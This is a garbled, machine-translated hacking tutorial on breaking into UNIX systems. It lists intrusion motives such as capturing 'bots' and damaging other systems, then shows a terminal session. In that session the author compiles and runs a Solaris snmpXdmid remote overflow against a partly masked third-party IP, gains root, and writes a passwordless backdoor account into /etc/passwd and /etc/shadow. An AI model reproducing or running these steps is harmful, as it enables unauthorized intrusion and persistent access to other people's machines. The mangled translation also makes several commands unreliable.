Best tutorial on linux intrusion (1)

I. Basic Knowledge

1: Common UNIX versions:

Sco unix, Sunos, Solaris, HP-UX, Digtal, Unix, IRIX, AIX, Linux, FreeBSD, javasbsd, A/UX, BSD, BSD-LITE, Goherent, Dynix, Hurd (GNN ), inTeractive, Mach, Minix, Mks Toolkit, NetNSD, OSF/I, System V Unix, Unicos, Unix ware...

2: a few simple introductions

Sunos & solaris SUN originally wanted to replace sunos with solaris. However, at the user's requirement, the policy of coexistence of the two has been maintained so far;

Freebsd is one of the successors of the famous BSD-UNIX. It is quite stable among many UNIX branches, and many ISPs use Freebsd;

Linux is a free and cheap UNIX product for PC users (its hardware platform is Intel series CPU). In fact, many network administrators actually use Linux.

3: UNIX operating system features

(1) multi-user and multi-task; (2) portability; (3) tree-line file system; (4) I/O redirection and pipeline technology; (5) rich utilities; (6) each user has an email.

4: Highlights

(1) high stability and reliability; (2) strong network functions; (3) good development; (4) Powerful database support functions; and (5) high scalability.

Ii. Purpose of intrusion

1: Learn UNIX, be familiar with internal operations, and complete configuration...

2: as a stepping stone or to capture more UNIX bots;

3: unauthorized access to something that is not available under normal requests;

4: attack or use this tool to damage other systems;

5: more ......

Iii. intrusion methods

1: Find the target

Tool: supperscan, streamer, LANguard Network protocol 2.0, or others, depending on your preferences

Supperscan: Scan port. Note that the host contains %, #, &.... These are UNIX;

LANguard... with simple settings, you can start to judge that the operating system functions of the other party are excellent and accurate in similar software;

Traffic: use advanced scanning, select telnet, PRC, POP3, FTP, and Finger.

The same is true for other methods...

(Note: Many administrators intentionally change the information displayed during telnet login to confuse intruders)

2: Start intrusion

(1) Overflow (all UNIX overflow needs to be compiled in a UNIX/Linux environment)

A: Remote Overflow

Overflow? Too many! Let's just talk about it: freebsd remote overflow, bind Remote Overflow, Sun Solaris 5.7/5.8 remote overflow, and redhat6.xrpc status remote overflow... let's take a look at them one by one. Here I will give two simple examples:

A1: considering a lot of friends use windows, so you can see my brother --- the blue knight masterpiece "freebsd overflow full text version" (Address: http://www.itser.com/ez/.bbs/topic.cgi? Forum = 7 & topic = 25 & show =), because this overflow program has been compiled and can be used directly in windows;

A2: Remote Overflow of Sun Solaris 5.7

Search... finally let me find a sunos 5.7 and a sunos 5.8

Telnet 66. *. 146.48 -----> This is mine!

Sunoperating 5.8

Login: ply

Password:

Last login: Tue Apr 23 03:55:09 from 39448. ddn. xaonli

Sun Microsystems Inc. SunOS 5.8 Generic February 2000

$ Tmp/. sh -----> handle overflow at that time!

# Ls

Bin data etc initrd mnt proc sbin usr

Boot dev home lib misc opt root tmp var

Xfn skip

# Cat> snmp. c

... -----> Too long, omitted... find it by yourself!

# Gcc-o snmp. c -----> compile with gcc

Snmp. c: In function 'main ':

Snmp. c: 181: warning: passing arg 3 of pointer to function from incompatible pointer type

Snmp. c: 181: warning: passing arg 4 of pointer to function from incompatible pointer type

Snmp. c: 181: warning: passing arg 5 of pointer to function from incompatible pointer type

# Ls

Bin data etc initrd mnt proc sbin snmp usr

Boot dev home lib misc opt root snmp. c tmp var

#./Snmp

Copyright last stage of delirium mar 2001 poland // lsd-pl.net/

SnmpXdmid for solaris 2.7 2.8

Usage:./s address [-p port]-v 7 | 8

#./Snmp 216. *. 45.63-v 7 ----> Start overflow !!

DELIRIUM mar 2001 poland // lsd-pl.net/

SnmpXdmid for solaris 2.7 2.8

Adr = 0x000c8f68 timeout = 30 port = 928 connected!

Sent!

SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u iSCSI SUNW, Ultra-80

Id

Uid = 0 (root) gid = 0 (root) -----> is root!

Echo "ply: 0: 0: // bin/bash">/etc/passwd -----> Add a user first!

Echo "ply ::::::::::" >>>/etc/shadow

... -----> Continue if you want to do anything else!